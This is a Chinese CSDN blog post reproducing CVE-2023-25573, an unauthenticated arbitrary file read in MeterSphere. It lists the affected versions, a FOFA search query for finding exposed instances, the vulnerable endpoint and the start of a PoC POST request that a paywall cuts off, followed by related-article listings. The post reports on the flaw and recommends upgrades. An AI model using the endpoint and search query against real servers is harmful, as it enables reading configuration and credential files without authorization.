MeterSphere files 任意文件读取漏洞复现 (CVE-2023-25573)

已于 2023-12-16 20:00:03 修改
阅读量1.3k 收藏 9
点赞数 7
分类专栏: 漏洞复现 文章标签: metersphere 安全 web安全
于 2023-12-16 17:53:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135035209
版权
本文介绍了MeterSphere的任意文件读取漏洞(CVE-2023-25573),详细阐述了漏洞概述、影响范围、复现环境以及提供修复建议。通过/api/jmeter/download/files路径,攻击者可以读取系统关键文件,威胁系统安全。受影响的版本包括MeterSphere v2.6.2及之前和v1.20.19 LTS及之前。复现环境可通过FOFA搜索MeterSphere。修复方案是升级到v2.7.1及以上或v1.20.20 LTS及以上版本。
摘要由CSDN通过智能技术生成

0x01 产品简介

MeterSphere 是一站式开源持续测试平台, 涵盖测试跟踪、接口测试、UI 测试和性能测试等功能,全面兼容 JMeter、Selenium 等主流开源标准。

0x02 漏洞概述

MeterSphere /api/jmeter/download/files 路径文件存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 影响范围

MeterSphere v2.6.2及之前的v2版本

MeterSphere v1.20.19 LTS及之前的v1版本

0x04 复现环境

FOFA:title="MeterSphere"

cad4851229074d59b33c9c675a618fb7.png

0x05 漏洞复现

PoC

POST /api/jmeter/download/files HTTP/1.1
Host: your-ip
Content-Type: application/json
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_1
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
专栏目录
订阅专栏
CVE-2023-25573MeterSphere 任意文件下载漏洞复现[附POC]
薛定谔嘚喵博客
11-30 664
metersphere 是一个开源的持续测试平台。在受影响的版本中,“/api/jmeter/download/files”中存在不正确地访问控制漏洞,该漏洞允许任何用户无需身份验证即可下载任何文件。此问题可能会暴露运行进程可用的所有文件
MeterSphere 任意文件读取漏洞CVE-2023-25814)
weixin_44304678的博客
11-08 1679
MeterSphere 是一站式开源持续测试平台, 涵盖测试跟踪、接口测试、UI 测试和性能测试等功能,全面兼容 JMeter、Selenium 等主流开源标准。
MeterSphere 匿名接口远程命令执行漏洞分析
whoami
01-10 2899
MeterSphere V1.16.3 匿名接口远程命令执行漏洞
Goby漏洞更新 | MeterSphere 文件读取漏洞CVE-2023-25814)
m0_46699477的博客
04-07 732
MeterSphere 是一站式开源持续测试平台, 涵盖测试跟踪、接口测试、UI 测试和性能测试等功能,全面兼容 JMeter、Selenium 等主流开源标准。MeterSphere存在未授权任意文件读取漏洞
MeterSphere 未授权RCE-代码审计
include_voidmain的博客
04-18 1405
0x01 代码分析 版本<=1.16.3 查看修复日志 https://github.com/metersphere/metersphere/pull/9135/commits/9927d2c587a2b388ee5d633f6cc31346df4415de 将/plugin/** 这个路由的未授权删除了,全局搜索/plugin定位到功能代码 跟进add方法中的pluginService.editPlugin(file) 跟进 在loadJar方法中使用URLClassLoader来加载j
MeterSphere :使用JavaScript脚本读取JSON里的数据信息
hxe116的博客
01-25 945
MeterSphere的前后置脚本是支持多语言的:beanshell、groovy、javascript、python(不过测试过程中发现MeterSphereV2.*版本Python是支持Python2版本)。现在使用JavaScript脚本来处理JSON信息的提取。比如响应体的内容是:{“code”:“200”,“data”:“Fit2cloud”,“msg”:“success”},需要提取data的数据传给变量。则有多种方式可以实现,MeterSphere都是能很好的支持。
Apache Ofbiz 任意文件读取漏洞CVE-2023-50968)
weixin_43567873的博客
03-11 145
Apache Ofbiz 任意文件读取漏洞CVE-2023-50968)
【1day】复现traggo server任意文件读取漏洞CVE-2023-34843)
记录并分享学习安全的知识点..
07-11 502
Traggo Server是一个基于标签的时间跟踪工具。在Traggo中,没有任务,只有标记的时间跨度。可以用来跟踪、分析你每天的时间都用在哪些地方,方便你更好的管理时间,提高自己的效率。Traggo Server存在任意文件读取漏洞
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268)
qq_51577576的博客
03-13 1005
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268) 在ImageMagick 7.1.0-51版本及以前存在CVE-2022-44268漏洞。 ImageMagick 7.1.0-49 容易受到信息泄露的攻击。当它解析PNG图像(例如,调整大小)时,生成的图像可能嵌入了任意远程文件的内容(如果ImageMagick二进制文件有权读取它)。
POC_MeterSphere-RCE
LiBai'S BLOG
01-13 3618
《飞致云MeterSphere开源测试平台远程代码执行漏洞漏洞详情 MeterSphere一站式开源持续测试平台存在的远程代码执行漏洞。由于自定义插件功能处存在缺陷,未经身份验证的攻击者可利用该漏洞在目标系统上远程执行任意代码。请相关用户尽快采取措施进行防护。 MeterSphere是由杭州飞致云信息科技有限公司开发的一站式开源持续测试平台, 涵盖测试跟踪、接口测试、性能测试、 团队协作等功能。兼容 JMeter、Postman、Swagger 等开源、主流标准,助力开发和测试团队利用云弹性进行高度可
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
rumil的博客
09-19 8744
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
CVE-2023-46604复现学习
shierbai的博客
05-19 744
Apache ActiveMQ是一个开源的、功能强大的消息代理(Message Broker),由 Apache Software Foundation 所提供。ActiveMQ 支持 Java Message Service(JMS)1.1 和 2.0规范,提供了一个高性能、简单、灵活和支持多种语言(Java, C, C++, Ruby, Python, Perl等)的消息队列系统。OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。
探秘网络安全新星:CVE-2023-4863/CVE-2023-41064 PoC 工具
gitblog_00100的博客
05-25 506
探秘网络安全新星:CVE-2023-4863/CVE-2023-41064 PoC 工具 项目地址:https://gitcode.com/mistymntncop/CVE-2023-4863 在这个数字化的时代,网络安全的重要性不言而喻。为了保障网络的健康和安全,开发者们不断挑战新的漏洞,寻找解决方案。今天,我们将向您推荐一个专注于CVE-2023-4863漏洞的Proof-of-Concept...
CraftCMS ConditionsController.php 代码执行漏洞CVE-2023-41892)
最新发布
0xSec
05-31 725
CraftCMS在4.4.15版本之前存在远程代码执行漏洞,攻击者可构造恶意请求执行任意代码,控制服务器。
GitLab 高危漏洞可导致账号遭接管
smellycat000的专栏
05-24 298
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士GitLab 修复了一个高危漏洞,它可导致未认证攻击者在跨站点脚本攻击中接管用户账户。该漏洞的编号是CVE-2024-4835,是位于VS 代码编辑器 (Web IDE)中的一个XSS弱点,可导致威胁行动者使用恶意构造的页面窃取受限制的信息。虽然攻击者可在无需认证的攻击中利用该漏洞,但仍然需要用户交互,因此增加了攻击的复杂性。GitLab 指出,...
Ivanti 修复Endpoint Manager 中的严重RCE漏洞
smellycat000的专栏
05-24 390
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士本周二,Ivanti 公司修复了位于 Endpoint Manager (EPM) 中的多个严重漏洞,在某些情况下可用于实现远程代码执行。Ivanti 本次共修复10个漏洞,其中6个即编号为从CVE-2024-29822到CVE-2024-29827(CVSS评分9.6)的漏洞与SQL注入有关,可导致位于同一个网络中的未认证攻击者执行任意代码。余...
“幽灵“再临!新型攻击瞄准英特尔CPU;微软Outlook漏洞被俄利用,网络间谍攻击捷克德国实体 | 安全周报0510
weixin_55163056的博客
05-10 1278
俄罗斯支持的APT28组织通过电子邮件对波兰政府机构进行恶意软件攻击,利用伪装和重定向诱导受害者下载恶意软件,使用DLL侧加载技术隐藏执行脚本。研究人员发现两种攻击方法,针对英特尔CPU,可泄露密钥和数据,称为“探路者”,能读取并操纵CPU分支预测器,对AES算法构成威胁。黑客利用WordPress LiteSpeed插件漏洞CVE-2023-40000)在易受攻击网站上创建恶意管理员账户,提升未验证用户权限。
openresty漏洞复现
04-03
OpenResty是一个基于Nginx的Web应用服务器,它通过Lua脚本语言扩展了Nginx的功能。关于OpenResty的漏洞复现,这里提供一个常见的漏洞示例:OpenResty的Lua代码注入漏洞。 Lua代码注入漏洞是指攻击者可以通过构造恶意请求,在OpenResty服务器上执行漏。攻击者可以利用该漏洞恶意操作,读取敏感文件、执行系统命令等。 下面是一个简单的OpenResty Lua代码注入漏洞复现示例: 1. 首先,创建一个名为test.lua的Lua脚本文件,内容如下: ```lua ngx.say("Hello, World!") ``` 2. 在OpenResty服务器上配置一个路由,将请求转发到test.lua脚本文件。例如,在nginx.conf文件中添加以下配置: ```nginx location /test { default_typetext/plain'; content_by_lua_file /path/to/test.lua; } ` 3. 重启OpenResty服务器使配置生效。 4. 访问http://yourdomain/test,将会执行test.lua脚本返回"Hello, World!"。 然而,需要注意的是,这只是一个简单的示例,实际的漏洞可能更加复杂和危险。在实际应用中,为了防止Lua代码注入漏洞,建议采取以下措施- 对用户输入进行严格的过滤和验证,避免将用户输入直接拼接到Lua代码中。 - 使用OpenResty提供的安全机制,如限制Lua代码的执行权限、禁用危险的Lua函数等。 - 及时更新Openy版本,以获取最新的安全修复。 希望以上信息对您有所帮助!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值